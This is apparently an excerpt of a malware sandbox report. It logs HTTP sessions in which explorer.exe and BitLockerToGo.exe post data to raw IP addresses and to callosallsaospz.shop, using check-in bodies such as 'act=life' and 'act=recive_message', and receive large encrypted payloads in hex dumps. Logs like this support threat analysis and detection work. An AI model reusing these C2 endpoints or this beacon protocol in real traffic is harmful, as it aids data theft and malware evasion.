                                                                                    2024-07-24 17:56:48 UTC685INData Raw: 45 36 54 56 74 58 46 64 47 71 2f 6a 67 6c 6d 70 47 58 47 64 51 4f 4a 6e 43 35 39 51 4c 6b 39 33 75 4a 41 50 4a 71 56 68 45 47 50 30 79 7a 55 47 72 7a 72 64 4b 35 5a 4b 37 45 64 46 6f 76 62 31 58 38 42 78 4c 68 36 38 62 38 46 61 39 70 4e 76 70 67 54 37 73 45 31 36 45 52 42 75 34 71 65 48 74 71 53 2f 41 6c 47 66 4d 63 51 55 77 36 50 6f 74 78 48 41 55 49 50 53 4a 66 30 39 52 41 31 56 4a 6d 64 6a 39 53 4e 33 61 4a 71 2f 6d 39 77 43 30 7a 49 78 4c 49 6f 5a 49 55 35 43 6b 42 6d 56 74 71 63 59 6b 77 41 43 30 54 4e 74 4e 48 35 77 68 4a 38 75 68 68 42 31 50 57 42 49 4d 53 69 6c 78 36 38 52 70 34 78 6b 75 48 6c 6f 41 39 58 77 75 4e 42 53 39 64 69 6d 52 6c 4a 35 6a 69 65 45 78 58 42 51 4c 37 51 69 71 44 46 32 55 41 79 4a 65 42 48 44 39 77 6a 41 45 4d 31 6c 36 35 4d
                                                                                    Data Ascii: E6TVtXFdGq/jglmpGXGdQOJnC59QLk93uJAPJqVhEGP0yzUGrzrdK5ZK7EdFovb1X8BxLh68b8Fa9pNvpgT7sE16ERBu4qeHtqS/AlGfMcQUw6PotxHAUIPSJf09RA1VJmdj9SN3aJq/m9wC0zIxLIoZIU5CkBmVtqcYkwAC0TNtNH5whJ8uhhB1PWBIMSilx68Rp4xkuHloA9XwuNBS9dimRlJ5jieExXBQL7QiqDF2UAyJeBHD9wjAEM1l65M


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.1049752167.235.128.1534433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:49 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 167.235.128.153
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1267
                                                                                    2024-07-24 17:56:49 UTC1267OUTData Raw: 4c 69 6b 39 73 45 46 6e 31 53 55 55 66 77 71 44 71 31 6d 4b 4f 34 4c 4f 6e 4a 4c 69 50 54 38 78 37 73 64 74 35 32 50 70 55 71 57 49 59 73 51 6e 4c 42 56 71 52 51 6c 4f 73 63 4b 70 36 53 72 41 4a 4d 65 74 6a 42 53 56 50 53 55 45 69 54 4c 43 78 50 30 6b 4b 68 59 4f 42 39 6e 64 6f 79 6c 30 75 58 55 7a 34 33 66 65 42 36 75 30 35 6d 37 72 47 58 41 66 6f 41 58 36 71 2f 5a 45 6f 2b 6a 45 72 4b 51 33 74 4e 2b 49 59 54 62 47 39 63 49 68 35 37 50 67 70 66 75 76 54 43 39 34 63 41 58 79 4e 6f 64 58 4b 35 56 30 41 37 36 44 61 57 6d 72 45 49 45 48 67 54 61 66 70 30 74 55 77 43 61 35 31 5a 45 68 6a 33 58 6b 43 64 36 38 54 56 32 61 37 53 2b 68 6e 46 5a 39 6d 5a 4c 36 49 75 2f 4d 56 4f 62 57 59 78 51 6f 30 30 49 34 6f 36 47 6d 63 72 6c 76 62 76 57 63 63 66 73 50 43 44 73
                                                                                    Data Ascii: Lik9sEFn1SUUfwqDq1mKO4LOnJLiPT8x7sdt52PpUqWIYsQnLBVqRQlOscKp6SrAJMetjBSVPSUEiTLCxP0kKhYOB9ndoyl0uXUz43feB6u05m7rGXAfoAX6q/ZEo+jErKQ3tN+IYTbG9cIh57PgpfuvTC94cAXyNodXK5V0A76DaWmrEIEHgTafp0tUwCa51ZEhj3XkCd68TV2a7S+hnFZ9mZL6Iu/MVObWYxQo00I4o6GmcrlvbvWccfsPCDs
                                                                                    2024-07-24 17:56:50 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:56:50 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:56:50 UTC685INData Raw: 68 6d 73 5a 75 66 38 69 75 62 55 77 51 53 4e 4e 31 4f 6f 56 5a 55 73 58 5a 4c 4f 56 76 31 52 77 72 6c 58 33 54 2f 67 54 58 31 57 56 75 30 59 38 77 66 4f 2b 2b 45 50 33 62 59 4d 49 70 7a 68 5a 67 4c 62 77 79 2f 65 58 75 68 59 61 68 78 63 4c 77 63 73 53 46 6e 50 69 47 34 31 45 6e 7a 43 4e 6b 6b 36 49 6c 31 50 52 61 43 69 4a 66 2f 51 5a 66 66 51 69 52 50 57 65 51 56 45 59 4a 38 6a 6a 71 49 46 70 72 57 4e 62 42 33 47 76 31 51 71 53 36 72 59 53 32 39 55 6a 6a 6c 73 55 4c 51 36 50 4e 6b 43 7a 31 64 75 58 31 6c 79 36 48 45 70 70 6f 75 34 35 47 70 44 70 34 2b 45 4b 43 65 47 53 68 4f 70 62 75 30 43 48 6d 35 6e 63 4b 37 4e 43 38 2f 2f 56 53 67 57 39 49 69 74 4b 4e 49 70 2f 4d 35 65 62 69 77 69 38 33 73 61 66 47 78 59 62 6d 38 79 59 6b 32 32 49 42 4c 2b 64 30 70 33
                                                                                    Data Ascii: hmsZuf8iubUwQSNN1OoVZUsXZLOVv1RwrlX3T/gTX1WVu0Y8wfO++EP3bYMIpzhZgLbwy/eXuhYahxcLwcsSFnPiG41EnzCNkk6Il1PRaCiJf/QZffQiRPWeQVEYJ8jjqIFprWNbB3Gv1QqS6rYS29UjjlsULQ6PNkCz1duX1ly6HEppou45GpDp4+EKCeGShOpbu0CHm5ncK7NC8//VSgW9IitKNIp/M5ebiwi83safGxYbm8yYk22IBL+d0p3


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.1049753107.173.160.1374433968C:\Windows\explorer.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:50 UTC234OUTPOST / HTTP/1.1
                                                                                    Host: 107.173.160.137
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Connection: close
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 1122
                                                                                    2024-07-24 17:56:50 UTC1122OUTData Raw: 4c 75 2f 55 56 62 78 4e 38 72 61 59 66 62 68 37 47 6d 6e 50 58 4d 6f 4c 30 38 37 69 54 68 77 4c 4b 72 39 56 76 4c 5a 78 6c 41 55 2b 48 57 66 4d 58 68 6e 2b 30 6b 78 66 36 33 66 77 37 61 77 4d 4c 41 37 2f 6f 57 6f 72 70 52 6a 49 6d 4e 6c 78 31 45 4f 77 2f 72 49 56 4a 6b 76 6c 39 75 64 43 4c 49 64 2f 54 31 32 56 58 6c 75 6a 51 6b 45 44 73 79 4e 58 72 58 77 2f 67 30 57 32 71 51 38 4a 43 46 64 31 48 43 6f 59 45 77 41 48 46 52 38 4a 6b 37 61 68 32 70 4b 53 61 48 61 2b 50 2f 52 30 5a 49 36 61 43 53 49 58 50 4f 66 34 35 42 53 36 68 37 2b 49 65 42 6c 4b 7a 63 6b 59 33 55 53 39 74 65 7a 34 49 31 63 49 43 71 58 5a 6d 4b 6e 59 35 64 70 4e 45 42 6b 43 34 59 41 38 67 30 4f 55 44 69 31 4a 37 71 6b 4f 6a 6e 72 6b 77 51 75 67 59 6c 36 78 32 50 57 79 52 79 65 53 4d 38 59
                                                                                    Data Ascii: Lu/UVbxN8raYfbh7GmnPXMoL087iThwLKr9VvLZxlAU+HWfMXhn+0kxf63fw7awMLA7/oWorpRjImNlx1EOw/rIVJkvl9udCLId/T12VXlujQkEDsyNXrXw/g0W2qQ8JCFd1HCoYEwAHFR8Jk7ah2pKSaHa+P/R0ZI6aCSIXPOf45BS6h7+IeBlKzckY3US9tez4I1cICqXZmKnY5dpNEBkC4YA8g0OUDi1J7qkOjnrkwQugYl6x2PWyRyeSM8Y
                                                                                    2024-07-24 17:56:52 UTC137INHTTP/1.1 200 OK
                                                                                    Content-Length: 685
                                                                                    Date: Wed, 24 Jul 2024 17:56:52 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    2024-07-24 17:56:52 UTC685INData Raw: 64 64 6d 74 6f 76 51 47 4d 41 54 74 66 77 79 32 77 4c 61 4d 59 4a 72 2f 62 34 67 65 42 4e 4b 6b 30 57 34 51 75 70 6f 68 63 62 4f 52 49 33 72 5a 79 70 37 4d 38 67 75 38 52 49 6b 59 51 6c 75 41 51 73 44 72 6e 34 52 63 68 34 50 6c 2b 58 75 72 54 74 48 70 48 59 42 76 38 61 73 74 30 6e 6d 64 6d 73 34 45 63 43 71 6d 6b 76 42 6b 6c 4a 41 34 53 6c 4f 2b 56 6b 33 41 75 41 65 55 49 32 4d 6b 56 42 72 67 33 6b 31 6a 73 64 41 57 78 72 7a 59 62 4d 36 70 69 56 47 46 6d 46 6e 2f 6e 37 2f 2b 36 58 62 4a 2b 56 4c 37 38 41 69 4b 72 71 7a 52 35 76 48 49 69 44 53 43 54 70 6b 67 43 72 59 73 78 61 31 34 4a 4f 51 61 2f 52 46 4b 37 38 44 34 68 43 55 50 35 57 50 65 45 49 71 6d 4b 61 54 69 56 30 75 6d 31 66 56 43 64 4e 64 4f 42 71 39 38 30 59 6a 56 69 49 36 6c 67 5a 33 67 42 2b 79
                                                                                    Data Ascii: ddmtovQGMATtfwy2wLaMYJr/b4geBNKk0W4QupohcbORI3rZyp7M8gu8RIkYQluAQsDrn4Rch4Pl+XurTtHpHYBv8ast0nmdms4EcCqmkvBklJA4SlO+Vk3AuAeUI2MkVBrg3k1jsdAWxrzYbM6piVGFmFn/n7/+6XbJ+VL78AiKrqzR5vHIiDSCTpkgCrYsxa14JOQa/RFK78D4hCUP5WPeEIqmKaTiV0um1fVCdNdOBq980YjViI6lgZ3gB+y


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.1049754188.114.96.34434216C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:51 UTC267OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: callosallsaospz.shop
                                                                                    2024-07-24 17:56:51 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-07-24 17:56:51 UTC818INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:56:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=0fsfcendtf04i24j93hvqkvjfg; expires=Sun, 17-Nov-2024 11:43:30 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LAD6l8zl06I%2FjfVVu%2Fzn1w6%2BqD4Duiv26bU2nHuLNd7%2FPA1Nd%2B2hszgaKbkuQ%2FMECEHil8SDMqtvSaMLpaRSeaVnZCiSSCECQm388%2BnDIs%2Bk8IStGGG8hb2SQbNpR9cIiCnjksVaBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85ca0becb14407-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:56:51 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                    Data Ascii: 2ok
                                                                                    2024-07-24 17:56:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.1049756188.114.96.34434216C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-07-24 17:56:52 UTC268OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 42
                                                                                    Host: callosallsaospz.shop
                                                                                    2024-07-24 17:56:52 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 62 4f 4b 48 4e 4d 2d 2d 26 6a 3d
                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=bOKHNM--&j=
                                                                                    2024-07-24 17:56:52 UTC822INHTTP/1.1 200 OK
                                                                                    Date: Wed, 24 Jul 2024 17:56:52 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=ogvo837pbpp1li85v3c6pihqoj; expires=Sun, 17-Nov-2024 11:43:31 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d5UMUNFwZTTA5V2nB%2FULhKVTMH%2BibJn%2F1TES%2BrCEbutR0uuNWgor1UmwAPXD%2Bhq%2Bs6%2B%2FsShWDoPSIkP8Aev6SRwjk%2Fzfe4DJdclgOOwizgg9wFk60Px93yKLSkvS6Bx15l%2B6gNZGxg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8a85ca137e8e72bc-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-07-24 17:56:52 UTC547INData Raw: 31 64 62 32 0d 0a 50 45 57 73 61 71 58 35 7a 67 2f 38 2b 6f 37 49 69 79 4e 70 66 52 76 57 50 6b 35 30 58 45 6f 6d 4a 66 41 49 6f 6a 33 41 35 6d 46 48 5a 39 70 49 6e 38 33 69 4c 59 2b 66 72 50 4c 2f 55 52 77 59 4e 2f 52 66 4b 6c 5a 6d 4c 45 64 4a 67 32 32 4f 48 37 61 4c 51 77 59 6a 7a 51 62 57 6e 4f 49 74 6d 59 4b 73 38 74 42 59 53 78 68 31 39 41 52 73 45 54 59 6f 52 30 6d 53 61 63 6c 53 73 49 6f 43 56 43 6e 4c 41 73 43 61 71 6d 36 51 6c 2b 75 74 37 6b 49 44 45 33 4b 37 56 69 4e 57 63 47 68 44 58 39 49 79 67 48 43 6c 6b 67 42 78 4a 4e 38 42 68 34 54 69 64 4e 36 66 34 4f 71 78 41 51 67 59 65 62 70 59 4b 68 38 30 49 6b 35 42 6b 32 7a 49 54 61 6d 41 43 56 51 6e 79 41 50 4b 6b 37 35 6a 6d 70 44 67 71 2b 52 43 53 31 45 35 73 30 52 73 54 6e 35 37 64 6b 53 44 65
                                                                                    Data Ascii: 1db2PEWsaqX5zg/8+o7IiyNpfRvWPk50XEomJfAIoj3A5mFHZ9pIn83iLY+frPL/URwYN/RfKlZmLEdJg22OH7aLQwYjzQbWnOItmYKs8tBYSxh19ARsETYoR0mSaclSsIoCVCnLAsCaqm6Ql+ut7kIDE3K7ViNWcGhDX9IygHClkgBxJN8Bh4TidN6f4OqxAQgYebpYKh80Ik5Bk2zITamACVQnyAPKk75jmpDgq+RCS1E5s0RsTn57dkSDe
                                                                                    2024-07-24 17:56:52 UTC1369INData Raw: 6d 59 45 51 49 6f 71 6d 42 2b 4d 67 77 42 4d 5a 66 73 4c 79 5a 57 72 65 39 36 48 6f 72 4f 70 52 67 64 66 49 66 52 53 4b 52 6b 73 4b 56 5a 43 6e 48 6a 4d 57 71 53 4a 41 46 41 6e 79 77 2f 4b 6c 61 70 71 6e 5a 44 6f 71 2b 64 4e 41 52 78 39 74 78 78 69 56 6a 6b 77 42 42 2f 53 57 38 4e 62 70 5a 59 41 55 47 66 52 52 74 37 62 71 32 48 65 77 4b 79 67 37 30 77 43 46 48 36 38 55 44 34 64 4d 53 74 4e 51 4a 52 67 77 31 65 6f 67 67 31 66 49 4d 73 50 31 5a 57 6e 59 4a 32 53 36 75 71 6e 41 51 77 48 4f 65 77 63 41 68 55 76 50 6e 5a 45 67 33 75 41 51 4f 79 64 51 31 6b 72 6a 6c 43 48 6b 71 52 69 6b 35 58 6d 70 4f 78 4d 41 68 35 34 75 56 6f 6e 46 7a 59 67 51 45 43 53 62 73 31 51 72 49 51 4e 56 69 4c 4b 41 73 37 62 34 69 32 5a 67 4b 7a 79 71 58 45 47 45 33 4b 34 48 68 6b 56
                                                                                    Data Ascii: mYEQIoqmB+MgwBMZfsLyZWre96HorOpRgdfIfRSKRksKVZCnHjMWqSJAFAnyw/KlapqnZDoq+dNARx9txxiVjkwBB/SW8NbpZYAUGfRRt7bq2HewKyg70wCFH68UD4dMStNQJRgw1eogg1fIMsP1ZWnYJ2S6uqnAQwHOewcAhUvPnZEg3uAQOydQ1krjlCHkqRik5XmpOxMAh54uVonFzYgQECSbs1QrIQNViLKAs7b4i2ZgKzyqXEGE3K4HhkV
                                                                                    2024-07-24 17:56:52 UTC1369INData Raw: 6d 41 62 63 42 57 72 49 73 50 56 79 72 4a 42 63 79 52 6f 57 6d 5a 6d 61 7a 6b 71 55 59 54 58 79 48 30 61 6a 77 62 4d 67 5a 50 53 35 73 71 33 78 47 37 78 41 52 53 5a 35 5a 49 77 35 65 6b 5a 35 47 52 35 71 44 6d 53 41 73 58 63 4c 31 66 4c 42 6f 34 4b 55 68 4c 6e 32 2f 44 57 71 2b 42 41 31 49 67 79 51 6d 48 31 65 78 71 68 74 69 30 36 74 6c 4d 42 78 52 31 39 6d 6b 76 47 44 41 76 55 67 65 4e 4a 4e 6b 66 70 59 68 44 42 6d 66 42 43 63 71 52 70 32 4f 53 6d 65 79 75 36 6b 73 4c 45 48 79 79 56 43 55 57 4c 43 39 4c 52 70 4e 68 79 31 4b 73 67 51 4a 62 49 49 35 47 68 35 79 30 4c 63 62 59 77 59 50 54 41 52 52 52 59 50 52 62 49 46 5a 6d 61 45 42 4e 6b 6d 66 4b 56 4b 32 48 42 46 41 6e 77 77 4c 56 6b 36 78 74 6b 4a 37 74 70 75 78 41 42 78 78 72 75 46 6f 68 45 44 59 36 42
                                                                                    Data Ascii: mAbcBWrIsPVyrJBcyRoWmZmazkqUYTXyH0ajwbMgZPS5sq3xG7xARSZ5ZIw5ekZ5GR5qDmSAsXcL1fLBo4KUhLn2/DWq+BA1IgyQmH1exqhti06tlMBxR19mkvGDAvUgeNJNkfpYhDBmfBCcqRp2OSmeyu6ksLEHyyVCUWLC9LRpNhy1KsgQJbII5Gh5y0LcbYwYPTARRRYPRbIFZmaEBNkmfKVK2HBFAnwwLVk6xtkJ7tpuxABxxruFohEDY6B
                                                                                    2024-07-24 17:56:52 UTC1369INData Raw: 4b 55 61 65 4c 42 6c 30 6f 79 51 58 42 6c 36 5a 6b 6c 70 37 6a 6f 2f 74 43 42 78 46 2b 75 6c 41 69 47 7a 51 72 53 51 66 63 4b 73 64 48 34 74 78 44 63 69 44 44 4a 73 79 58 71 79 32 42 31 76 58 71 37 6b 31 4c 52 7a 6d 34 56 69 41 66 50 69 46 42 54 35 6c 6a 78 56 36 70 67 51 42 59 4b 73 45 42 31 5a 47 76 59 35 32 55 34 4b 7a 6f 51 68 6b 58 63 50 51 53 62 42 45 6d 61 42 77 48 73 32 54 4e 53 36 57 55 51 30 46 70 31 30 6a 41 6c 2b 77 31 33 70 76 74 70 65 70 41 42 68 6c 77 76 46 77 71 45 7a 45 6c 53 6b 43 56 61 73 31 52 72 59 49 4c 55 79 76 46 42 73 36 64 72 47 79 55 32 4b 4c 71 37 6c 6c 4c 52 7a 6d 45 58 79 77 57 4a 57 68 62 43 59 73 71 78 31 50 69 33 45 4e 4d 4c 63 63 49 78 4a 53 72 61 5a 57 55 36 61 2f 6d 51 67 49 61 63 4c 70 4f 4a 52 67 32 49 45 74 43 6d 57
                                                                                    Data Ascii: KUaeLBl0oyQXBl6Zklp7jo/tCBxF+ulAiGzQrSQfcKsdH4txDciDDJsyXqy2B1vXq7k1LRzm4ViAfPiFBT5ljxV6pgQBYKsEB1ZGvY52U4KzoQhkXcPQSbBEmaBwHs2TNS6WUQ0Fp10jAl+w13pvtpepABhlwvFwqEzElSkCVas1RrYILUyvFBs6drGyU2KLq7llLRzmEXywWJWhbCYsqx1Pi3ENMLccIxJSraZWU6a/mQgIacLpOJRg2IEtCmW
                                                                                    2024-07-24 17:56:52 UTC1369INData Raw: 68 77 42 66 4c 64 77 61 79 35 4b 6b 61 4a 4b 54 34 71 7a 37 52 77 51 57 65 72 64 56 4b 78 34 79 49 6b 64 41 30 69 53 41 57 4c 72 45 57 78 34 45 32 52 6a 4b 32 37 4d 6a 68 39 6a 72 70 71 6b 5a 53 78 64 30 76 46 59 6f 45 54 4d 76 51 6b 36 41 59 38 56 52 6f 6f 41 49 55 53 48 4b 43 38 65 4a 71 6d 6d 57 6d 2b 47 6e 35 30 49 50 58 7a 66 30 57 7a 52 57 5a 6d 68 32 53 70 78 78 7a 31 69 7a 6a 6b 4e 42 61 64 64 49 77 4a 66 73 4e 64 36 63 34 72 6a 69 51 41 41 55 64 37 4e 54 4b 52 77 2b 4a 30 42 45 6e 47 48 42 58 4b 71 4a 44 6c 41 74 78 77 48 41 6c 36 68 71 33 74 61 73 72 66 45 42 55 31 39 53 6c 58 45 41 45 53 52 6f 57 77 6d 4c 4b 73 64 54 34 74 78 44 55 69 37 43 41 73 79 63 70 6d 4f 58 6c 75 65 34 2b 30 49 50 48 48 43 33 57 79 55 59 50 69 39 42 53 5a 56 72 79 31 75
                                                                                    Data Ascii: hwBfLdway5KkaJKT4qz7RwQWerdVKx4yIkdA0iSAWLrEWx4E2RjK27Mjh9jrpqkZSxd0vFYoETMvQk6AY8VRooAIUSHKC8eJqmmWm+Gn50IPXzf0WzRWZmh2Spxxz1izjkNBaddIwJfsNd6c4rjiQAAUd7NTKRw+J0BEnGHBXKqJDlAtxwHAl6hq3tasrfEBU19SlXEAESRoWwmLKsdT4txDUi7CAsycpmOXlue4+0IPHHC3WyUYPi9BSZVry1u
                                                                                    2024-07-24 17:56:52 UTC1369INData Raw: 53 75 4f 55 49 65 61 70 32 65 52 6c 65 2b 73 36 6b 6f 4f 46 58 69 7a 56 43 45 45 50 53 64 4c 51 35 4a 6c 78 6c 6d 6a 69 77 56 5a 4c 73 38 41 77 4e 76 69 4c 5a 6d 41 72 50 4b 70 62 77 77 63 66 66 52 44 59 67 39 2b 4c 30 67 48 79 69 72 41 56 61 69 4f 44 56 34 67 33 41 37 4f 6d 36 39 2f 6e 5a 37 6b 72 4f 56 4e 42 68 64 77 74 46 6b 6e 47 7a 55 6c 51 6b 65 5a 61 34 41 52 34 6f 4d 62 48 6e 2b 4f 4f 63 71 56 71 47 4f 64 69 4f 76 71 39 67 38 53 58 33 36 34 48 48 52 57 4d 53 46 57 51 4a 64 69 79 56 2b 73 6a 51 70 5a 49 38 30 4a 77 35 65 6a 5a 4a 32 51 37 61 4c 6d 51 67 73 55 63 62 35 64 49 68 4e 2b 5a 67 52 41 69 69 71 59 48 34 32 48 42 6c 55 6d 6a 43 2f 42 6e 4b 41 74 67 64 62 31 36 75 35 4e 53 30 63 35 74 31 67 69 48 7a 45 73 54 6b 43 53 62 63 5a 66 71 6f 38 4f
                                                                                    Data Ascii: SuOUIeap2eRle+s6koOFXizVCEEPSdLQ5JlxlmjiwVZLs8AwNviLZmArPKpbwwcffRDYg9+L0gHyirAVaiODV4g3A7Om69/nZ7krOVNBhdwtFknGzUlQkeZa4AR4oMbHn+OOcqVqGOdiOvq9g8SX364HHRWMSFWQJdiyV+sjQpZI80Jw5ejZJ2Q7aLmQgsUcb5dIhN+ZgRAiiqYH42HBlUmjC/BnKAtgdb16u5NS0c5t1giHzEsTkCSbcZfqo8O
                                                                                    2024-07-24 17:56:52 UTC218INData Raw: 6a 56 32 2f 51 74 32 5a 76 2b 75 4f 39 43 48 52 77 2b 69 6d 49 43 45 54 67 74 51 31 66 51 52 4d 74 4c 70 63 52 4e 48 69 69 4f 55 50 37 62 35 43 32 68 31 71 79 79 71 52 6c 4c 4b 6e 71 36 55 69 73 41 4c 32 56 71 51 4a 52 76 78 30 2f 67 71 67 68 4b 49 49 35 47 68 35 33 73 4e 63 37 57 72 4b 37 34 41 56 4e 50 4b 2b 38 4a 66 30 46 75 65 6c 73 4a 69 79 72 57 48 2f 72 57 54 52 34 31 6a 6c 43 48 33 4b 39 2f 6a 4a 37 76 76 4f 6f 47 4e 53 46 36 6f 6c 45 6a 48 54 38 57 65 6d 6d 66 61 38 4e 52 34 4c 55 56 55 7a 66 4e 44 63 43 6c 6b 6d 4f 5a 6a 4f 75 6b 37 30 46 4c 55 54 6d 37 48 48 51 76 66 6d 41 45 65 4e 77 71 32 42 2f 36 78 44 5a 64 4b 63 41 50 30 59 0d 0a
                                                                                    Data Ascii: jV2/Qt2Zv+uO9CHRw+imICETgtQ1fQRMtLpcRNHiiOUP7b5C2h1qyyqRlLKnq6UisAL2VqQJRvx0/gqghKII5Gh53sNc7WrK74AVNPK+8Jf0FuelsJiyrWH/rWTR41jlCH3K9/jJ7vvOoGNSF6olEjHT8Wemmfa8NR4LUVUzfNDcClkmOZjOuk70FLUTm7HHQvfmAEeNwq2B/6xDZdKcAP0Y
                                                                                    2024-07-24 17:56:52 UTC1369INData Raw: 32 34 36 65 0d 0a 72 68 54 6f 69 56 34 36 48 6f 41 55 56 66 66 2f 51 45 66 46 68 2b 4c 46 55 48 79 6a 71 53 42 50 66 58 56 41 35 31 30 55 62 65 32 37 6f 74 78 73 71 69 36 76 73 42 55 31 38 2b 75 6c 45 74 46 54 41 72 56 6c 57 55 61 64 5a 63 35 62 6f 39 66 79 72 46 42 4d 71 55 70 31 4f 67 75 65 47 68 35 55 77 45 46 45 65 4b 53 53 38 59 4d 43 39 53 56 74 49 6b 67 46 44 69 33 44 6f 65 62 34 34 33 69 64 75 30 4c 63 62 59 32 61 6e 6e 54 77 77 4a 61 50 6c 39 49 52 30 79 4a 55 74 4d 30 69 53 41 57 65 4c 63 55 78 42 6e 79 68 6d 48 77 2f 77 2f 78 63 32 2f 2f 62 6b 54 46 46 46 67 39 45 70 73 54 6d 78 6d 42 46 58 53 4d 6f 41 59 6f 5a 59 52 57 43 54 59 43 34 43 6c 6b 6b 36 4a 6a 75 61 78 71 32 63 4d 44 6e 43 69 55 54 34 6f 41 41 5a 4a 52 70 46 6b 67 6d 36 30 69 52 4e
                                                                                    Data Ascii: 246erhToiV46HoAUVff/QEfFh+LFUHyjqSBPfXVA510Ube27otxsqi6vsBU18+ulEtFTArVlWUadZc5bo9fyrFBMqUp1OgueGh5UwEFEeKSS8YMC9SVtIkgFDi3Doeb443idu0LcbY2annTwwJaPl9IR0yJUtM0iSAWeLcUxBnyhmHw/w/xc2//bkTFFFg9EpsTmxmBFXSMoAYoZYRWCTYC4Clkk6Jjuaxq2cMDnCiUT4oAAZJRpFkgm60iRN
                                                                                    2024-07-24 17:56:52 UTC1369INData Raw: 35 4c 49 2b 7a 33 4d 68 36 4b 7a 71 56 64 4c 52 79 76 36 48 44 35 57 5a 6d 67 44 52 49 42 34 78 6c 79 30 68 30 52 67 47 65 67 4c 31 70 47 4e 59 49 36 66 30 70 54 38 51 67 55 52 66 71 4a 4e 62 46 68 2b 4a 77 51 66 71 79 71 49 45 36 53 48 46 52 34 59 67 45 6a 66 32 2f 51 74 71 35 76 69 70 4f 35 58 47 6c 4a 66 74 30 30 6d 4e 7a 4d 34 51 77 66 63 4b 73 59 66 2b 74 64 4e 48 69 50 66 53 4a 2f 4c 2f 6a 62 4c 79 37 76 36 75 31 35 46 42 6a 6d 69 48 48 52 45 63 47 68 57 42 38 6f 71 68 31 79 77 6c 67 56 64 4d 63 31 50 2b 61 57 5a 62 70 43 57 36 37 7a 63 51 68 6f 63 65 62 39 69 45 6a 63 77 49 30 4e 4c 68 46 54 2b 61 71 47 4b 44 56 6b 78 33 30 69 4a 32 36 4d 74 78 71 47 73 34 71 6c 2b 52 56 39 68 39 41 52 73 49 7a 30 6d 53 6b 43 45 65 34 31 71 6f 5a 55 41 58 69 79 4f
